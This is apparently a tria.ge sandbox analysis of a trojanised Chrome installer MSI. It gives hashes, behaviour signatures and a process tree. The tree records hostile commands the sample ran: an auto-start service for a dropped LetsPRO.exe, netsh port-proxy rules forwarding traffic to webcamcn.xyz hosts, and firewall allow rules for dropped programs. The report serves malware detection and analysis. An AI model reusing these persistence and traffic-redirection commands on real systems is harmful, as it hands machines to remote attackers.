Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    299s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26/04/2024, 10:42

General

  • Target

    sutup-Chrome.13.26.x64.msi

  • Size

    15.6MB

  • MD5

    86561e111e7ce97e13a9936b9b4ba849

  • SHA1

    61cd40da9253a367e416c9ab67e73738f18948c3

  • SHA256

    bd462515ea9ffe66fc27d9baa0fcc4bf733385829c2fc5676129aaeeb2e0af88

  • SHA512

    33d26416412d777fb2758bc41b44a9e9107906879c85bb4609702242deb2bcd83ed8a5f5da7a1d3e4662ca7b31dbfbbe1faa8364952546ff600136e8c2cf7d54

  • SSDEEP

    393216:qCBN2m9uaDsIqvv3/L/2m68UzYWIMWLBM36dmdRwhm7YLp:RkmqvHv1M/q8dOh

Malware Config

Signatures

  • Creates new service(s) 1 TTPs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies Installed Components in the registry 2 TTPs 7 IoCs
  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Sets file execution options in registry 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 11 IoCs
  • Executes dropped EXE 61 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Loads dropped DLL 64 IoCs
  • Registers COM server for autorun 1 TTPs 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\sutup-Chrome.13.26.x64.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:508
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:200
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 6F1E5D814FB0192616999BC1A2D19C17
      2⤵
      • Loads dropped DLL
      PID:5088
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Enumerates connected drives
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:1716
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:1488
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:4224
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 232
        3⤵
        • Program crash
        PID:4968
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      PID:4692
    • C:\Program Files (x86)\ChromeSetup.exe
      "C:\Program Files (x86)\ChromeSetup.exe"
      2⤵
      • Drops file in Program Files directory
      • Executes dropped EXE
      PID:4764
      • C:\Program Files (x86)\Google\Temp\GUM6274.tmp\GoogleUpdate.exe
        "C:\Program Files (x86)\Google\Temp\GUM6274.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
        3⤵
        • Sets file execution options in registry
        • Drops file in Program Files directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4680
        • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
          "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies registry class
          PID:404
        • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
          "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies registry class
          PID:3176
          • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
            "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Registers COM server for autorun
            • Modifies registry class
            PID:3604
          • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
            "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Registers COM server for autorun
            • Modifies registry class
            PID:3080
          • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
            "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Registers COM server for autorun
            • Modifies registry class
            PID:3988
        • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
          "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNzIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MTcyMEQ0RjQtODBDQy00NTVBLThERDQtNjFDMzYyMDFCN0E2fSIgdXNlcmlkPSJ7Q0Y4RTExNTMtMEMwOC00ODYyLUIyODgtMUEzMDJBRkEzNUEwfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezkyNkQzRDMzLTFGNDgtNDg4Ni1BRUQ0LTUwN0E1RkVDQTZDOX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zNzIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7ODUyRDA3NUEtQ0I5RC02MzYwLTRFNEQtNDI3QkJCNEYxMUUxfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSI3MjM0Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3596
        • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
          "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{1720D4F4-80CC-455A-8DD4-61C36201B7A6}"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1340
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2372
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:2352
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3464
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:420
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2324
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:4372
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3836
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:4640
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      PID:2148
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      PID:876
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:880
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:4636
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:2912
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:652
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:2396
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:3460
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:4204
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:988
    • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
      "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
      2⤵
      • Executes dropped EXE
      PID:792
      • C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
        "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:4824
  • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
    1⤵
    • Drops file in Program Files directory
    • Executes dropped EXE
    • Loads dropped DLL
    • Modifies data under HKEY_USERS
    PID:3984
    • C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\124.0.6367.92_chrome_installer.exe
      "C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\124.0.6367.92_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\guiCA86.tmp"
      2⤵
      • Drops file in Program Files directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2576
      • C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\CR_2DCAC.tmp\setup.exe
        "C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\CR_2DCAC.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\CR_2DCAC.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\guiCA86.tmp"
        3⤵
        • Modifies Installed Components in the registry
        • Drops file in Program Files directory
        • Executes dropped EXE
        • Registers COM server for autorun
        • Modifies registry class
        PID:1048
        • C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\CR_2DCAC.tmp\setup.exe
          "C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\CR_2DCAC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=124.0.6367.92 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff7236896b8,0x7ff7236896c4,0x7ff7236896d0
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          PID:1488
        • C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\CR_2DCAC.tmp\setup.exe
          "C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\CR_2DCAC.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          PID:3688
          • C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\CR_2DCAC.tmp\setup.exe
            "C:\Program Files (x86)\Google\Update\Install\{8E304C0E-720B-4FE1-8A1F-E1160B7A4805}\CR_2DCAC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=124.0.6367.92 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff7236896b8,0x7ff7236896c4,0x7ff7236896d0
            5⤵
            • Executes dropped EXE
            PID:1820
    • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe
      "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3460
    • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe
      "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4008
    • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNzIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MTcyMEQ0RjQtODBDQy00NTVBLThERDQtNjFDMzYyMDFCN0E2fSIgdXNlcmlkPSJ7Q0Y4RTExNTMtMEMwOC00ODYyLUIyODgtMUEzMDJBRkEzNUEwfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezAwNTRGMkNBLTVCNUItNDQxOC05NUEzLTQwNDY1MzM2OTlFRH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTI0LjAuNjM2Ny45MiIgYXA9Ing2NC1zdGFibGUtc3RhdHNkZWZfMSIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIyMSIgaWlkPSJ7ODUyRDA3NUEtQ0I5RC02MzYwLTRFNEQtNDI3QkJCNEYxMUUxfSIgY29ob3J0PSIxOmd1L2kxOToiIGNvaG9ydG5hbWU9IlN0YWJsZSBJbnN0YWxscyAmYW1wOyBWZXJzaW9uIFBpbnMiPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vZWRnZWRsLm1lLmd2dDEuY29tL2VkZ2VkbC9yZWxlYXNlMi9jaHJvbWUvYmY1eHZ4Z2oyNno1Nmd6dGVjbm5tMzJtM2VfMTI0LjAuNjM2Ny45Mi8xMjQuMC42MzY3LjkyX2Nocm9tZV9pbnN0YWxsZXIuZXhlIiBkb3dubG9hZGVkPSIxMTIwODA5NDQiIHRvdGFsPSIxMTIwODA5NDQiIGRvd25sb2FkX3RpbWVfbXM9Ijk1MTYiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjcwNyIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjU0NyIgZG93bmxvYWRfdGltZV9tcz0iMTA3NTAiIGRvd25sb2FkZWQ9IjExMjA4MDk0NCIgdG90YWw9IjExMjA4MDk0NCIgaW5zdGFsbF90aW1lX21zPSIyOTM2MCIvPjwvYXBwPjwvcmVxdWVzdD4
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:4600
  • C:\Windows\system32\cscript.exe
    cscript C:\Users\Admin\68200\837746.vbs
    1⤵
    • Modifies data under HKEY_USERS
    PID:1488
  • C:\Windows\system32\cmd.exe
    cmd /c cscript C:\Users\Admin\68200\837746.vbs
    1⤵
      PID:4560
      • C:\Windows\system32\cscript.exe
        cscript C:\Users\Admin\68200\837746.vbs
        2⤵
        • Modifies data under HKEY_USERS
        PID:3416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe cscript C:\Users\Admin\68200\837746.vbs
      1⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:532
    • C:\Windows\system32\sc.exe
      sc create 837746993 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 837746993
      1⤵
      • Launches sc.exe
      PID:4256
    • C:\Windows\system32\netsh.exe
      netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
      1⤵
      • Modifies data under HKEY_USERS
      PID:3900
    • C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
      1⤵
      • Modifies Windows Firewall
      • Modifies data under HKEY_USERS
      PID:4032
    • C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
      1⤵
      • Modifies Windows Firewall
      • Modifies data under HKEY_USERS
      PID:2220
    • C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
      1⤵
      • Modifies Windows Firewall
      • Modifies data under HKEY_USERS
      PID:5096
    • C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
      1⤵
      • Modifies Windows Firewall
      • Modifies data under HKEY_USERS
      PID:1548
    • C:\Windows\system32\netsh.exe
      netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
      1⤵
      • Modifies data under HKEY_USERS
      PID:1320
    • C:\Windows\system32\taskkill.exe
      taskkill /f /t /im wegame.exe
      1⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4728
    • C:\Windows\system32\taskkill.exe
      taskkill /f /t /im WeGame.exe
      1⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4188
    • C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe
      "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe" -Embedding
      1⤵
      • Executes dropped EXE
      PID:5032
      • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2620
